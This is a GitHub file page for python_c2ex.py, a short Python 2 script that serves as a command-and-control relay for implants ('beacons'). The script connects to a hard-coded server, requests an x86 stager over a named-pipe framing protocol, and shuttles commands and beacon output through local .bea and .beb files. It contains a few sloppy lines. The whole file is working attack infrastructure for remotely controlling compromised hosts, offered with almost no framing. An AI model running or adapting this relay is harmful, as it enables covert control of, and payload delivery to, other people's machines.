-
Notifications
You must be signed in to change notification settings - Fork 34
/
python_c2ex.py
117 lines (108 loc) · 3.17 KB
/
python_c2ex.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
#!/usr/bin/python
import socket
import sys
import os
from time import sleep
import struct
def createSocket():
d = {}
d['sock'] = socket.create_connection(('192.168.1.51', 2222))
d['state'] = 1
#sock.setblocking(1)
return (d)
def recv_frame(sock):
try:
chunk = sock.recv(4)
except:
return("")
if len(chunk) < 4:
return()
slen = struct.unpack('<I', chunk)[0]
chunk = sock.recv(slen)
while len(chunk) < slen:
chunk = chunk + sock.recv(slen - len(chunk))
return(chunk)
def send_frame(sock, chunk):
#slen = struct.pack('>L', len(chunk))
slen = struct.pack('<I', len(chunk))
#print "sending %s"%len(chunk)
sock.sendall( slen + chunk )
#sock.sendall(chunk)
def getStage(sock):
send_frame(sock,"arch=x86")
send_frame(sock,"pipename=foobar")
send_frame(sock,"block=100")
send_frame(sock,"go")
stager = recv_frame(sock)
#print "got stage"
return stager
def closeSocket(socket):
sock.close()
beacons = {}
while(True):
files = os.listdir("./")
for ffile in files:
sys.stdout.flush()
if ffile.strip()[-4:] == ".bea":
fsize = os.stat(ffile).st_size
#print "processing %s [%s bytes]"%(ffile,fsize)
if ffile in beacons and fsize > 0:
sock = beacons[ffile]['sock']
print "#%d"%fsize,
sleep(1)
f = open(ffile,'rb')
chunk = f.read()
f.close()
#print "send frame %s, and clear bea"%len(chunk)
send_frame(sock,chunk)
open(ffile, 'w').close()
sleep(1)
#print "recv frame"
ret = recv_frame(sock)
#discard all under 2 bytes
if len(ret) > 1:
print "got %s bytes command"%len(ret)
f = open("%s.beb"%ffile[:-4], 'wb')
f.write(ret)
f.close()
# clear input queue
#let's assume we hit this once and upgrade status
beacons[ffile]['state'] = 2
open(ffile, 'w').close()
elif ffile not in beacons and fsize > 0:
print "N"
beacons[ffile] = createSocket()
#we need a stager and socket
ret = getStage(beacons[ffile]['sock'])
if len(ret) > 0:
print "got %s bytes command"%len(ret)
f = open(ffile,'rb')
f = open("%s.beb"%ffile[:-4], 'wb')
f.write(ret)
f.close()
# clear input queue
open(ffile, 'w').close()
elif ffile in beacons and fsize == 0:
#print "ff niet"
if beacons[ffile]['state'] == 2:
#let's check for new commands waiting on socket just pump some in to get a response
print "0",
send_frame(beacons[ffile]['sock'],"\0")
ret = recv_frame(beacons[ffile]['sock'])
if len(ret) > 1:
print "got %s bytes command"%len(ret)
f = open("%s.beb"%ffile[:-4], 'wb')
f.write(ret)
f.close()
# clear input queue
#open(ffile, 'w').close()
else:
#old files delete them
try:
os.remove(ffile)
os.remove("%s.beb"%ffile[:-4])
break
except:
break
print ".",
sleep(1)